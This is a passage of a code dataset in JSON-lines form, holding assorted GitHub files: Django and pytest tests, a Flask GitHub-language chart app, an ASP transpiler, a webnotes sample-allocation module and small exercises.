\"Pass123test\",\n \"password2\": \"Pass123test\",\n \"first_name\": \"Test\",\n \"last_name\": \"User\",\n \"phone_number\": \"+380955084759\",\n \"position\": self.position,\n }\n self.form = WorkerCreationForm(data=self.form_data)\n\n def test_worker_creation_is_valid(self):\n self.assertTrue(self.form.is_valid())\n self.assertEqual(self.form.cleaned_data, self.form_data)\n\n def test_phone_number_equal_13(self):\n phone_numbers = [\"+3809550847511\", \"+3809550847\"]\n\n for phone_number in phone_numbers:\n form_data = {\"phone_number\": phone_number}\n form = WorkerUpdateForm(data=form_data)\n\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"phone_number\"][0],\n \"Phone number should consist of 13 characters\"\n )\n\n def test_phone_number_first_character(self):\n form_data = {\"phone_number\": \"1380955084751\"}\n\n form = WorkerUpdateForm(data=form_data)\n\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"phone_number\"][0],\n \"Phone number should start with a character '+'\"\n )\n\n def test_phone_number_last_5_characters_digits(self):\n form_data = {\"phone_number\": \"+A80955084751\"}\n\n form = WorkerUpdateForm(data=form_data)\n\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"phone_number\"][0],\n \"Last 12 characters should be digits\"\n )\n\n\nclass TaskTests(TestCase):\n def setUp(self) -> None:\n self.position = Position.objects.create(\n name=\"Developer\"\n )\n self.task_type = TaskType.objects.create(\n name=\"Bug\"\n )\n self.user = get_user_model().objects.create_user(\n username=\"john_smith\",\n phone_number=\"+380955084755\",\n first_name=\"John\",\n last_name=\"Smith\",\n password=\"Johns12345\",\n position=self.position\n )\n\n self.client.force_login(self.user)\n\n def test_create_task(self):\n response = self.client.post(\n reverse(\"task_manager:task-create\"),\n {\n \"name\": \"Test Task\",\n \"description\": \"Test description\",\n \"deadline\": \"2023-08-25\",\n \"is_completed\": False,\n \"priority\": \"Medium\",\n \"task_type\": self.task_type.id,\n \"assignees\": [self.user.id],\n },\n )\n self.assertEqual(response.status_code, 302)\n self.assertEqual(\n Task.objects.get(id=self.user.tasks.first().id).name, \"Test Task\"\n )\n\n def test_update_task(self):\n task = Task.objects.create(\n name=\"Test Task\",\n description=\"Test description\",\n deadline=\"2023-08-25\",\n is_completed=False,\n priority=\"Medium\",\n task_type=self.task_type,\n )\n response = self.client.post(\n reverse(\"task_manager:task-update\", kwargs={\"pk\": task.id}),\n {\n \"pk\": task.id,\n \"description\": \"Test description\",\n \"deadline\": \"2023-08-25\",\n \"is_completed\": False,\n \"priority\": \"Medium\",\n \"name\": \"Not Test Task\",\n \"task_type\": self.task_type.id,\n \"assignees\": [self.user.id],\n },\n )\n Task.objects.get(id=task.id).refresh_from_db()\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.get(id=task.id).name, \"Not Test Task\")\n\n def test_delete_task(self):\n task = Task.objects.create(\n name=\"Test Task\",\n description=\"Test description\",\n deadline=\"2023-08-25\",\n is_completed=False,\n priority=\"Medium\",\n task_type=self.task_type,\n )\n response = self.client.post(\n reverse(\"task_manager:task-delete\", kwargs={\"pk\": task.id})\n )\n self.assertEqual(response.status_code, 302)\n self.assertFalse(Task.objects.filter(id=task.id).exists())\n\n\nclass SearchFormTests(TestCase):\n def setUp(self) -> None:\n self.position = Position.objects.create(\n name=\"Designer\"\n )\n self.task_type = TaskType.objects.create(\n name=\"New feature\"\n )\n self.user = get_user_model().objects.create_user(\n username=\"john_smith\",\n phone_number=\"+380955084755\",\n first_name=\"John\",\n last_name=\"Smith\",\n password=\"Johns12345\",\n position=self.position\n )\n\n self.client.force_login(self.user)\n\n def test_task_search_form(self):\n Task.objects.create(\n name=\"Test Task\",\n description=\"Test description\",\n deadline=\"2023-08-25\",\n is_completed=False,\n priority=\"Medium\",\n task_type=self.task_type,\n )\n form_data = {\"name\": \"Test\"}\n form = TaskSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = Task.objects.filter(name=\"Test Task\")\n\n response = self.client.get(\n reverse(\"task_manager:task-list\") + \"?name=\" + form_data[\"name\"]\n )\n self.assertEqual(\n list(response.context[\"task_list\"]), list(expected_result)\n )\n\n def test_position_search_form(self):\n form_data = {\"name\": \"Designer\"}\n form = PositionSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = Position.objects.filter(name=\"Designer\")\n\n response = self.client.get(\n reverse(\n \"task_manager:position-list\") + \"?name=\" + form_data[\"name\"]\n )\n self.assertEqual(\n list(response.context[\"position_list\"]), list(expected_result)\n )\n\n def test_task_type_search_form(self):\n form_data = {\"name\": \"New\"}\n form = TaskTypeSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = TaskType.objects.filter(name=\"New feature\")\n\n response = self.client.get(\n reverse(\n \"task_manager:task-type-list\"\n ) + \"?name=\" + form_data[\"name\"]\n )\n self.assertEqual(\n list(response.context[\"task_type_list\"]), list(expected_result)\n )\n\n def test_worker_search_form(self):\n form_data = {\"username\": \"john\"}\n form = WorkerSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = get_user_model().objects.filter(\n username=\"john_smith\"\n )\n\n response = self.client.get(\n reverse(\n \"task_manager:worker-list\"\n ) + \"?username=\" + form_data[\"username\"]\n )\n self.assertEqual(\n list(response.context[\"worker_list\"]), list(expected_result)\n )\n","repo_name":"PodorogaNatalia/it-company-task-manager","sub_path":"task_manager/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":7627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40800315960","text":"# guard_example.py\r\nimport time\r\nfrom collections import namedtuple\r\n\r\nfrom miros import spy_on\r\nfrom miros import Event\r\nfrom miros import signals\r\nfrom miros import ActiveObject\r\nfrom miros import return_status\r\n\r\nOptionalPayload = namedtuple('OptionalPayload', ['x'])\r\n\r\ndef guard():\r\n return True\r\n\r\ndef action():\r\n print('some action')\r\n\r\n@spy_on\r\ndef source_state(chart, e):\r\n status = return_status.UNHANDLED\r\n if(e.signal == signals.SIGNAL_NAME):\r\n if guard():\r\n action()\r\n chart.post_fifo(Event(signal=signals.EVT_A))\r\n status = chart.trans(target_state)\r\n else:\r\n chart.temp.fun = chart.top\r\n status = return_status.SUPER\r\n return status\r\n \r\n@spy_on\r\ndef target_state(chart, e):\r\n chart.temp.fun = chart.top\r\n status = return_status.SUPER\r\n return status\r\n\r\nif __name__ == \"__main__\":\r\n # event arrow example\r\n ao = ActiveObject('eae')\r\n ao.live_trace = True\r\n ao.start_at(source_state)\r\n ao.post_fifo(Event(signal=signals.SIGNAL_NAME,\r\n payload=OptionalPayload(x='1')))\r\n time.sleep(0.01)\r\n\r\n","repo_name":"aleph2c/miros","sub_path":"examples/guard_example.py","file_name":"guard_example.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"76"} +{"seq_id":"70786104566","text":"import os\nimport pytest\nimport torch\nfrom src.dataset.utils import nifi_volume\nfrom src.losses import new_losses, utils\nfrom torch import nn\n\n\n@pytest.fixture(scope=\"function\")\ndef gt_mask():\n patient = \"BraTS20_Training_001_p0_64x64x64\"\n gen_path = \"/Users/lauramora/Documents/MASTER/TFM/Data/2020/train/random_tumor_distribution/\"\n volume_path = os.path.join(gen_path, patient, f\"{patient}_seg.nii.gz\")\n return nifi_volume.load_nifi_volume(volume_path, normalize=False)\n\n@pytest.fixture(scope=\"function\")\ndef volume_flair():\n patient = \"BraTS20_Training_001_p0_64x64x64\"\n gen_path = \"/Users/lauramora/Documents/MASTER/TFM/Data/2020/train/random_tumor_distribution/\"\n volume_path = os.path.join(gen_path, patient, f\"{patient}_flair.nii.gz\")\n return nifi_volume.load_nifi_volume(volume_path, normalize=True)\n\n\nclass Identity(nn.Module):\n\n def forward(self, input):\n return input\n\ndef test_dice_loss(gt_mask):\n\n gt_mask[gt_mask == 4] = 3\n\n my_loss = new_losses.GeneralizedDiceLoss()\n\n seg_mask = torch.from_numpy(gt_mask.astype(int))\n\n target = seg_mask.unsqueeze(0).to(\"cpu\")\n target = utils.expand_as_one_hot(target, num_classes=4)\n\n my_loss.normalization = Identity()\n\n loss, score = my_loss(target, target)\n\n assert round(loss.item()) == 0\n assert round(score.item()) == 1\n\n\ndef test_dice_los_real_results(gt_mask, volume_flair):\n from src.models.vnet import vnet\n\n gt_mask[gt_mask == 4] = 3\n\n network = vnet.VNet(elu=True, in_channels=1, classes=4, init_features_maps=16)\n network.to(\"cpu\")\n\n my_loss = new_losses.GeneralizedDiceLoss()\n\n network.train()\n volume_flair = torch.from_numpy(volume_flair).unsqueeze(0).unsqueeze(0)\n outputs, scores = network(volume_flair.float())\n\n seg_mask = torch.from_numpy(gt_mask.astype(int))\n\n target = seg_mask.unsqueeze(0).to(\"cpu\")\n target = utils.expand_as_one_hot(target, num_classes=4)\n\n\n loss, score = my_loss(outputs, target)\n\n assert round(loss.item()) == 1\n assert round(score.item()) == 0","repo_name":"imatge-upc/mri-braintumor-segmentation","sub_path":"tests/losses/test_new_loss.py","file_name":"test_new_loss.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"76"} +{"seq_id":"42971205136","text":"\"\"\" Main \"\"\"\n\nfrom urllib import urlopen\nfrom flask import Flask, render_template, request, Blueprint\nfrom bs4 import BeautifulSoup\nimport chartkick\n\napp = Flask(__name__)\nck = Blueprint('ck_page', __name__, static_folder=chartkick.js(), static_url_path='/static')\napp.register_blueprint(ck, url_prefix='/ck')\napp.jinja_env.add_extension(\"chartkick.ext.charts\")\n\n\ndef fetch(username):\n \"\"\"\n Function to fetch the user's language from Github.\n \"\"\"\n lang_dict = {}\n url = \"https://github.com/\" + username + \"?tab=repositories\"\n resp = urlopen(url)\n\n if resp.getcode() == 404:\n return \"Username doesn't exist\"\n elif resp.getcode() == 200:\n soup = BeautifulSoup(resp, \"lxml\")\n\n for repo_details in soup.find_all(class_='repo-list-stats'):\n repo_lang = str(repo_details.contents[0].strip())\n\n if repo_lang == \"\":\n repo_lang = \"Other\"\n\n if repo_lang in lang_dict:\n lang_dict[repo_lang] += 1\n else:\n lang_dict[repo_lang] = 1\n\n # return lang_dict\n return render_template(\"chart.html\", user=username, data=lang_dict)\n else:\n return \"There was an error. HTTP response code: \" + str(resp.getcode())\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n \"\"\"\n This function serves the GET and POST request for the index.html\n \"\"\"\n if request.method == \"POST\":\n return fetch(request.form[\"username\"])\n return render_template(\"index.html\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"arafsheikh/my-github-lang-chart","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25449042863","text":"import pandas as pd\nfrom MLP import MLP\nfrom auxiliar import train_test_split\n\ni = 25 #nº de neurônios de entrada\nj = 10 #nº de neurônios da camada oculta\nk = 3 #nº de neurônios de saída\n\n#base de dados\nsheet_url = \"https://docs.google.com/spreadsheets/d/10Bd1gwY9GK6dJg-web9TLN0PSJ_m4p820BngimA-ud0/edit#gid=0\"\nurl = sheet_url.replace('/edit#gid=', '/export?format=csv&gid=')\nbase = pd.read_csv(url) #os números estão representados por conjuntos de 25 bits\n\nmlp = MLP(base, i, j, k)\n\nx_train, y_train, x_test, y_test = train_test_split(base)\nmlp.fit(x_train, y_train)\npred = mlp.predict(x_test)\nprint('y_test')\nprint(y_test)\nprint('predict')\nprint(pred)\n\n\n\n","repo_name":"pslayne/neural-network","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70698311927","text":"from app.data_models.answer_store import AnswerStore\nfrom app.data_models.relationship_store import RelationshipStore\nfrom app.questionnaire.relationship_location import RelationshipLocation\nfrom app.questionnaire.relationship_router import RelationshipRouter\n\n\ndef relationship_router(answers=None, relationships=None):\n return RelationshipRouter(\n answer_store=AnswerStore(answers),\n relationship_store=RelationshipStore(relationships),\n section_id=\"relationships-section\",\n list_name=\"people\",\n list_item_ids=[\"abc123\", \"def123\", \"ghi123\", \"jkl123\"],\n relationships_block_id=\"relationships\",\n )\n\n\ndef relationship_location(list_item_id, to_list_item_id):\n return RelationshipLocation(\n section_id=\"relationships-section\",\n list_name=\"people\",\n list_item_id=list_item_id,\n to_list_item_id=to_list_item_id,\n block_id=\"relationships\",\n )\n\n\ndef test_can_access_location():\n location = relationship_location(\"abc123\", \"def123\")\n can_access_location = relationship_router().can_access_location(location)\n assert can_access_location\n\n\ndef test_cant_access_location():\n location = relationship_location(\"def123\", \"abc123\")\n can_access_location = relationship_router().can_access_location(location)\n assert not can_access_location\n\n\ndef test_get_first_location():\n first_location = relationship_router().get_first_location()\n expected_location = relationship_location(\"abc123\", \"def123\")\n assert first_location == expected_location\n\n\ndef test_get_last_location():\n last_location = relationship_router().get_last_location()\n expected_location = relationship_location(\"ghi123\", \"jkl123\")\n assert last_location == expected_location\n\n\ndef test_get_next_location():\n location = relationship_location(\"abc123\", \"def123\")\n next_location = relationship_router().get_next_location(location)\n expected_location = relationship_location(\"abc123\", \"ghi123\")\n assert next_location == expected_location\n\n\ndef test_get_next_location_goes_to_next_person():\n location = relationship_location(\"abc123\", \"jkl123\")\n next_location = relationship_router().get_next_location(location)\n expected_location = relationship_location(\"def123\", \"ghi123\")\n assert next_location == expected_location\n\n\ndef test_get_previous_location():\n location = relationship_location(\"abc123\", \"ghi123\")\n previous_location = relationship_router().get_previous_location(location)\n expected_location = relationship_location(\"abc123\", \"def123\")\n assert previous_location == expected_location\n\n\ndef test_get_previous_location_goes_to_previous_person():\n location = relationship_location(\"def123\", \"ghi123\")\n previous_location = relationship_router().get_previous_location(location)\n expected_location = relationship_location(\"abc123\", \"jkl123\")\n assert previous_location == expected_location\n","repo_name":"ONSdigital/eq-questionnaire-runner","sub_path":"tests/app/questionnaire/test_relationship_router.py","file_name":"test_relationship_router.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"3940983839","text":"\ndef printMatrix(A):\n\tfor i in A:\n\t\tfor j in i:\n\t\t\tprint(j,end=' ')\n\t\tprint(\"\")\n\ndef dot(v1,v2):\n\treturn sum([v1[i]*v2[i] for i in range(len(v1))])\n\ndef introduce_slack(f,A,b):\n\tnumber_of_slack=len(A)\n\tfinalMatrix=[[-i for i in f]+[0]*(number_of_slack+1)]\n\t\n\tfor i in range(number_of_slack):\n\t\tfinalMatrix.append(A[i]+[0]*i+[1]+[0]*(number_of_slack-i-1)+[b[i]])\n\t\n\treturn(finalMatrix)\n\ndef done(A):\n\tfor i in range(len(A[0])-1):\n\t\tif A[0][i]<0:\n\t\t\treturn False\n\treturn True\n\ndef find_pivot(A):\n\tmini=0\n\tminind=-1\n\tfor i in range(len(A[0])):\n\t\tif A[0][i]<0 and A[0][i]0 or A[i][-1]<0) and A[i][pivot_col]/A[i][-1]>mini:\n\t\t\tmini=A[i][pivot_col]/A[i][-1]\n\t\t\tminind=i\n\tpivot_row=minind\n\treturn((pivot_row,pivot_col))\n\ndef row_add(A,r1,r2,scalar): #r2 += scalar * r1\n\tfor i in range(len(A[0])):\n\t\tA[r2][i]+=scalar*A[r1][i]\n\ndef clear_column(A,pivot):\n\trow=pivot[0]\n\tcol=pivot[1]\n\tfor i in range(len(A)):\n\t\tif i!=row and (A[i][col]>0 or A[i][col]<0):\n\t\t\tscalar=-A[i][col]/A[row][col]\n\t\t\trow_add(A,row,i,scalar)\n\t\telif i==row:\n\t\t\ta=A[row][col]\n\t\t\tfor j in range(len(A[row])):\n\t\t\t\tA[row][j]/=a\n\ndef pivot(A,B,pivot):\n\tprint(\"PIVOT\",pivot,B)\n\tB[pivot[0]-1]=pivot[1]\n\tclear_column(A,pivot)\n\ndef conclude(A,B,f):\n\tresult=[0 for i in f]\n\t\n\tfor i in range(len(B)):\n\t\tif B[i] indentation and prevIndentation > 2:\n # w('}' * (prevIndentation - indentation))\n # prevIndentation = indentation\n # if bodyMode:\n # w('.' + lf)\n unindent(prevIndentation, indentation)\n prevIndentation = indentation\n w('%' + ln)\n bodyMode = False\n continue\n\n if '\"' in ln or \"'\" in ln:\n raise ValueError('String literals are not supported yet.')\n\n # Strip away the first tab.\n ln = ln[1:]\n readBody = isBody(ln)\n\n # We recognized a body, now strip away the next tab.\n if readBody:\n ln = ln[1:]\n\n if not readBody:\n ln = ln.lstrip()\n\n # Preprocessor rules (constants).\n if ln[0] == '#':\n w(ln)\n continue\n\n # Since we are in head mode we can strip away (no need to read any further indentation).\n ln = ln.lstrip()\n\n # We were in body mode, so terminate the previous body.\n # if bodyMode:\n # w('.')\n unindent(prevIndentation, 1)\n prevIndentation = 1\n bodyMode = False\n\n # Check for a hard constraint.\n if len(ln) == 2 and ln[0] == cons[1]:\n w(cons + lf)\n continue\n\n # Check for a weak constraint.\n if len(ln) == 2 and ln[0] == wcons[1]:\n w(wcons + lf)\n continue\n\n # TODO: This breaks for string literals (there may be a pipe in a string literal).\n ln = ln.split('|')\n\n # Special case: Facts over fixed integer ranges.\n # TODO: This breaks for string literals (there might be two dots inside a string literal).\n if len(ln) == 1 and '..' in ln[0]:\n w(atomize(ln[0].strip()) + '.' + lf)\n # Since this fact auto-terminates, we fake prevIndentation.\n prevIndentation = 0\n continue\n\n w(tab + ' v '.join(map(lambda x: atomize(x.strip()), ln)) + ' ' + cons + ' ')\n continue\n\n # We are treating bodies from here on.\n if not bodyMode:\n w(lf)\n\n indentation = 2\n while ln[0] == tab:\n indentation += 1\n ln = ln[1:]\n\n # Strip away trailing newline and other stuff...\n ln = ln.strip()\n\n isAggregate = False\n for aggregate in aggregates:\n if ln.startswith(aggregate):\n isAggregate = True\n\n # We first handle the easier case of non-aggregates.\n if not isAggregate:\n unindent(prevIndentation, indentation)\n\n if bodyMode and prevIndentation >= indentation:\n w(',')\n\n w(tab * indentation + atomize(ln))\n prevIndentation = indentation\n bodyMode = True\n continue\n\n ln = keepSpaces(ln)\n if bodyMode:\n w(lf + ',')\n\n w(tab * indentation + ln[1] + ' = ' + ln[0] + '{' + (','.join(ln[2:]) if len(ln) > 3 else ln[2]) + ': ' + lf)\n bodyMode = True\n\n if bodyMode:\n w('.')\n","repo_name":"lorenzleutgeb/asp-lite","sub_path":"asp_lite/transpile.py","file_name":"transpile.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6166821651","text":"from __future__ import unicode_literals\nfrom webnotes.model.doc import addchild\nfrom webnotes.model.doc import Document\nfrom webnotes.model.bean import getlist\nfrom webnotes.model.doc import getchildren\nfrom webnotes.utils import cint, cstr, flt, now, nowdate\n\nimport webnotes\n\nclass DocType:\n\tdef __init__(self, d, dl):\n\t\tself.doc, self.doclist = d, dl\n\n\tdef on_submit(self):\n\t\tself.update_sample_status()\n\n\n\t#Update sample status to the Lab Entry after completing the sample allocation to lab stage.\n\tdef update_sample_status(self):\n\t\tfor sample in getlist(self.doclist, 'final_sample_allocation'):\n\t\t\twebnotes.conn.sql(\"update tabSample set status = 'Lab Entry' where name ='\"+sample.sample_no+\"'\")\n\t\t\twebnotes.conn.sql(\"commit\")\n\t\t\t\n\n\n\t#Select sample details from sample table with respect to the priority & quantity specified.\n\tdef get_sample_details(self,priority):\n\t\t#n=0\n\t\tif priority=='Critical':\n\t\t\tsample_details=webnotes.conn.sql(\"select name, barcode from `tabSample` where priority='\"+priority+\"' and status='Ready To Lab Entry' \",as_list=1)\n\n\t\telif priority=='Normal':\n\t\t\tsample_details=webnotes.conn.sql(\"select name, barcode from `tabSample` where priority='\"+priority+\"' and status='Ready To Lab Entry'\",as_list=1)\n\t\telse:\n\t\t\tsample_details=webnotes.conn.sql(\"select name, barcode from `tabSample` where priority='\"+priority+\"' and status='Ready To Lab Entry'\",as_list=1)\n\t\tif self.doc.flag1==0 and self.doc.priority=='Critical':\n\t\t\t\twebnotes.msgprint(\"Sorry--!!! You have Already choose priority='\"+priority+\"' please choose any other priority\",raise_exception=1)\n\t\telif self.doc.flag2==1 and self.doc.priority=='Normal':\n\t\t\t\twebnotes.msgprint(\"Sorry--!!! You have Already choose priority='\"+priority+\"' please choose any other priority\",raise_exception=1)\n\t\telif self.doc.flag3==2 and self.doc.priority=='Urgent':\n\t\t\t\twebnotes.msgprint(\"Sorry--!!! You have Already choose priority='\"+priority+\"' please choose any other priority\",raise_exception=1)\t\t\t\n\t\telse:\n\n\t\t\tfor i in sample_details:\n\t\t\t\t\ttest=webnotes.conn.sql(\"select group_concat(b.test_name),a.group_name from `tabTest Allocation` a,`tabRegister Test Name` b where a.name=b.parent and sample_no='\"+i[0]+\"'\")\n\t\t\t\t\t#webnotes.errprint(test[0][1])\n\t\t\t\t\tif test:\n\t\t\t\t\t\tch = addchild(self.doc, 'prioritywise_sample_allocation', \n\t\t\t\t\t\t'Priority Wise Sample Allocation', self.doclist)\n\t\t\t\t\t\tch.priority = priority\n\t\t\t\t\t\tch.sample_no=i[0]\n\t\t\t\t\t\tch.bottle_no=i[1]\n\t\t\t\t\t\tch.test=test[0][0]\n\t\t\t\t\t\tch.test_group=test[0][1]\n\t\t\t\t\t\tch.save(new=1)\n\t\t\t\t\telse:\n\t\t\t\t\t\twebnotes.msgprint(\"There is no any record against current sample No in Test Allocation\")\n\t\t\tif priority=='Critical':\n\n\t\t\t\treturn{\n\t\t\t\t\t\t'flag1':0\n\t\t\t\t}\n\t\t\t\t\n\t\t\telif priority=='Normal':\n\t\t\t\treturn{\n\t\t\t\t\t\t'flag2':1\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\treturn{\n\t\t\t\t\t\t'flag3':2\n\t\t\t\t}\n\n\n\t#Add sample number details according to the specified quantity and priority\n\tdef get_prioritywise_details(self):\n\n\t\tlist1=[]\n\t\tlist2=[]\n\t\tlist3=[]\n\t\tif self.doc.critical_samples and self.doc.normal_samples and self.doc.urgent_samples:\n\n\t\t\tfor p in getlist(self.doclist, 'prioritywise_sample_allocation'):\n\t\t\t\t#webnotes.errprint(x.priority)\n\t\t\t\tif p.priority=='Critical':\n\t\t\t\t\tlist1.append(p.priority)\n\t\t\t\t\t\n\t\t\t\telif p.priority=='Normal':\n\t\t\t\t\tlist2.append(p.priority)\n\t\t\t\telse:\n\t\t\t\t\tlist3.append(p.priority)\n\t\t\tif cstr(len(list1))<= self.doc.critical_samples:\n\n\t\t\t\tif cstr(len(list2))<= self.doc.normal_samples:\n\n\t\t\t\t\tif cstr(len(list3))<= self.doc.urgent_samples:\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\twebnotes.msgprint(\"Number Of smples having priority 'Urgent' is not equal to or less than the specified quantity of samples for this priority\",raise_exception=1)\n\n\t\t\t\telse:\n\t\t\t\t\twebnotes.msgprint(\"Number Of smples having priority Normal is not equal to the specified quantity of samples for this priority\",raise_exception=1)\n\n\n\t\t\telse:\n\t\t\t\twebnotes.msgprint(\"Number Of smples having priority Critical is not equal to the specified quantity of samples for this priority\",raise_exception=1)\n\n\n\t\t\tself.doclist=self.doc.clear_table(self.doclist,'final_sample_allocation')\n\n\t\t\tfor d in getlist(self.doclist, 'prioritywise_sample_allocation'):\n\t\t\t\t#webnotes.errprint(d)\n\t\t\t\tcd =addchild(self.doc,'final_sample_allocation','Final Sample Allocation To Lab',self.doclist)\n\t\t\t\tcd.priority=d.priority\n\t\t\t\tcd.sample_no=d.sample_no\n\t\t\t\tcd.bottle_no=d.bottle_no\n\t\t\t\tcd.test_group=d.test_group\n\t\t\t\tcd.test=d.test\n\t\t\t\tcd.save(new=1)\n\t\t\t\n\n\n#To map sample allocation to lab page to the Sample allocation to Tester page \n@webnotes.whitelist()\ndef sample_allocation_to_tester(source_name, target_doclist=None):\n\t\n\treturn _sample_allocation_to_tester(source_name, target_doclist)\n\n\n\ndef _sample_allocation_to_tester(source_name, target_doclist=None, ignore_permissions=False):\n\n\tfrom webnotes.model.mapper import get_mapped_doclist\n\t# webnotes.errprint(source_name)\n\tdef postprocess(source, doclist):\n\t\t#webnotes.errprint(source_name)\n \t\tdoclist[0].sample_allocation_lab= source_name\n\tdoclist = get_mapped_doclist(\"Sample Allocation To Lab\", source_name, {\n\t\t\t\"Sample Allocation To Lab\": {\n\t\t\t\t\"doctype\": \"Sample Allocation\", \n\t\t\t\t\t\t\t\t\n\t\t\t\t\"validation\": {\n\t\t\t\t\t\"docstatus\": [\"=\", 1]\n\t\t\t\t}\n\t\t\t}\n\t},target_doclist ,postprocess)\n\n\treturn [d.fields for d in doclist]\n\n\n\n#Get count of samples according to the priority\n@webnotes.whitelist()\ndef get_count():\n\t#webnotes.errprint(\"in get count\")\n\tcount_dict = {'Normal': 0,'Urgent': 0,'Critical': 0}\n\n\tcounts=webnotes.conn.sql(\"select priority,count(priority) from `tabSample` where status='Ready To Lab Entry' group by priority\",as_list=1)\n\t# webnotes.errprint(counts)\n\t# webnotes.errprint(len(counts))\n\n\tfor i in counts:\n\t\t\tcount_dict[i[0]] = i[1]\n\n\t#webnotes.errprint(count_dict)\n\n\t\n\treturn [[k, v] for k, v in count_dict.iteritems()]\n\n","repo_name":"saurabh6790/tru_app_back","sub_path":"test/doctype/sample_allocation_to_lab/sample_allocation_to_lab.py","file_name":"sample_allocation_to_lab.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32852600744","text":"import sys\ninput = sys.stdin.readline\n\na = int(input())\nold_lst = list(map(int, input().split()))\nold_lst.sort()\nb = int(input())\nnew_lst = list(map(int, input().split()))\n\nfor i in new_lst: # 이진탐색\n first, last, res = 0, len(old_lst)-1, 0\n while first <= last:\n mid = int((first + last)/2)\n if i > old_lst[mid]:\n first = mid + 1\n elif i < old_lst[mid]:\n last = mid - 1\n else:\n res = 1\n break\n print(res)\n","repo_name":"DohyunJegal/Baekjoon","sub_path":"class2/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12710695877","text":"# [문제]\n# 이싸피는영화정보를제공해주는서비스의개발팀에서데이터분석을담당하고있다. \n# The Movie Database API를이용하여데이터를수집하였다.\n# 받아온영화샘플정보는dictionary 형태이다. \n# 영화데이터는다음과같이구성되어있다고할때아래의신규기능을추가하려고한다.\n\n# 평점이8점이상이라면True를반환하고, 8점미만이라면False를반환하는함수is_good_rate를완성하시오. \n# (반환되는값True와False는bool 자료형이다.)\n\n# [문제풀이]\n# 1. if문을 딕셔너리의 value를 이용해서 True와 False를 구분\n\n\n\n# 함수 내부에 불필요한 print문이 있는 경우 오답으로 처리가 됩니다.\ndef is_good_rate(movie):\n if movie['user_rating'] >= 8: # user_rating의 값이 8이상이면 True\n return True\n else:\n return False\n\n\n\n# 아래의 코드를 수정하거나 새롭게 추가하지 않습니다.\n########## 코드 변경 금지 ############\nif __name__ == '__main__':\n movie = {\n \"id\": 1,\n \"user_rating\": 8.1,\n \"title\": \"그리고 내일\",\n \"overview\": \"과거보다 더 성장한 당신은 드디어 꿈을 이루게 된다.\",\n }\n\n print(is_good_rate(movie)) # True","repo_name":"KimBeomGi/STUDYduringSSAFY","sub_path":"월말평가/1월 월말평가/월말평가_01_Python_10problems/구미2반_김범기/problem03.py","file_name":"problem03.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2992600129","text":"import os\nfrom pandas import DataFrame\nfrom app.api.products.inventory_plot.schema import InventoryPlotParams\nfrom app.utils.paths import TMP_DIR\nfrom rinstat import cdms_products\n\n\ndef inventory_plot_create(data: DataFrame, params: InventoryPlotParams) -> str:\n\n output_path: str = TMP_DIR\n output_file_name: str = \"inventory_plot.jpg\"\n\n return_val = cdms_products.inventory_plot(\n path=output_path,\n file_name=output_file_name,\n data=data,\n date_time=params.date_time,\n elements=params.elements,\n station=params.station,\n year=params.year,\n doy=params.doy,\n year_doy_plot=params.year_doy_plot,\n facet_by=params.facet_by,\n facet_x_size=params.facet_x_size,\n facet_y_size=params.facet_y_size,\n title=params.title,\n plot_title_size=params.plot_title_size,\n plot_title_hjust=params.plot_title_hjust,\n x_title=params.x_title,\n y_title=params.y_title,\n x_scale_from=params.x_scale_from,\n x_scale_to=params.x_scale_to,\n x_scale_by=params.x_scale_by,\n y_date_format=params.y_date_format,\n y_date_scale_by=params.y_date_scale_by,\n y_date_scale_step=params.y_date_scale_step,\n facet_scales=params.facet_scales,\n facet_dir=params.facet_dir,\n facet_x_margin=params.facet_x_margin,\n facet_y_margin=params.facet_y_margin,\n facet_nrow=params.facet_nrow,\n facet_ncol=params.facet_ncol,\n missing_colour=params.missing_colour,\n present_colour=params.present_colour,\n missing_label=params.missing_label,\n present_label=params.present_label,\n display_rain_days=params.display_rain_days,\n rain=params.rain,\n rain_cats=params.rain_cats,\n coord_flip=params.coord_flip,\n )\n\n return_path: str = os.path.join(output_path, output_file_name)\n return return_path\n","repo_name":"IDEMSInternational/opencdms-components-server-demo","sub_path":"app/services/inventory_plot.py","file_name":"inventory_plot.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 